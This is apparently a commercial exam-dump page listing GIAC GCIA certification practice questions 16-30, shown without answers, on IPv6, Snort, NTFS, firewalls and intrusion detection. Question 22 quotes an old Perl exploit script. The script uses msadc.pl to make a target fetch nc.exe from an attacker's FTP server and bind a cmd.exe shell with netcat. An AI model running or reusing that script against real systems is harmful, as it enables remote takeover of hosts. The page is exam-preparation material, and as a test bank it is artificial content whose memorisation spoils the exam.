Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code = getmirror

Pass the GIAC Security Administration GCIA Questions and answers with ExamsMirror

Practice at least 50% of the questions to maximize your chances of passing.
Exam GCIA Premium Access

View all detail and faqs for the GCIA exam


725 Students Passed

89% Average Score

93% Same Questions
Viewing page 2 out of 11 pages
Viewing questions 16-30 out of questions
Questions # 16:

Which of the following is not a function of the Snort utility?

Options:

A.

Routing messages

B.

Packet sniffing

C.

Packet logging

D.

Intrusion detection

Questions # 17:

Which of the following terms is used to represent IPv6 addresses?

Options:

A.

Hexadecimal-dot notation

B.

Colon-dot

C.

Dot notation

D.

Colon-hexadecimal

Questions # 18:

Which of the following is used to hash the information in Netcat?

Options:

A.

MD5

B.

SHA-256

C.

MD5deep

D.

SHA-1

Questions # 19:

Which of the following tools can be used to view active telnet sessions?

Options:

A.

Juggernaut

B.

Cgichk

C.

Nikto

D.

Hackbot

Questions # 20:

Which of the following tools allows an attacker to intentionally craft the packets to gain unauthorized access?

Each correct answer represents a complete solution. Choose two.

Options:

A.

Fragroute

B.

Ettercap

C.

Mendax

D.

Tcpdump

Questions # 21:

Which of the following tables is formed by NTFS file system to keep the track of files, to store metadata, and their location?

Options:

A.

The Master File Table

B.

The System File Table

C.

The Master Allocation Table

D.

The File Allocation Table

Questions # 22:

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Opens up a SMTP server that requires no username or password

B.

Creates a share called "sasfile" on the target system

C.

Creates an FTP server with write permissions enabled

D.

Opens up a telnet listener that requires no username or password

Questions # 23:

Which of the following IP addresses is the loopback address in IPv6?

Options:

A.

1:0:0:0:0:0:0:0

B.

0:0:0:0:0:0:0:0

C.

0:0:0:0:0:0:0:1

D.

0:0:0:1:1:0:0:0

Questions # 24:

For a host to have successful Internet communication, which of the following network protocols are required? You should assume that the users will not manually configure the computer in anyway and that the measure of success will be whether the user can access Web sites after powering the computer and logging on.

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

NTP

B.

HTTP/HTTPS

C.

DNS

D.

DHCP

Questions # 25:

A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel?

Options:

A.

Stunnel

B.

IPTables

C.

IPChains

D.

OpenSSH

Questions # 26:

Which of the following protocols uses only User Datagram Protocol (UDP)?

Options:

A.

FTP

B.

ICMP

C.

TFTP

D.

POP3

Questions # 27:

Which of the following ICMPv6 neighbor discovery messages is sent by hosts to request an immediate router advertisement, instead of waiting for the next scheduled advertisement?

Options:

A.

Neighbor Solicitation

B.

Router Solicitation

C.

Neighbor Advertisement

D.

Router Advertisement

Questions # 28:

Which of the following commands used in Linux to create bit-stream images?

Options:

A.

ss

B.

xcopy

C.

dd

D.

img

Questions # 29:

Which of the following fields of the IPv6 header is similar to the TTL field of IPv4?

Options:

A.

Hop Limit

B.

Next Header

C.

Flow Label

D.

Traffic Class

Questions # 30:

Which system is designed to analyze, detect, and report on security-related events?

Options:

A.

NIPS

B.

HIPS

C.

NIDS

D.

HIDS

Viewing page 2 out of 11 pages
Viewing questions 16-30 out of questions
TOP CODES

TOP CODES

Top selling exam codes in the certification world, popular, in demand and updated to help you pass on the first try.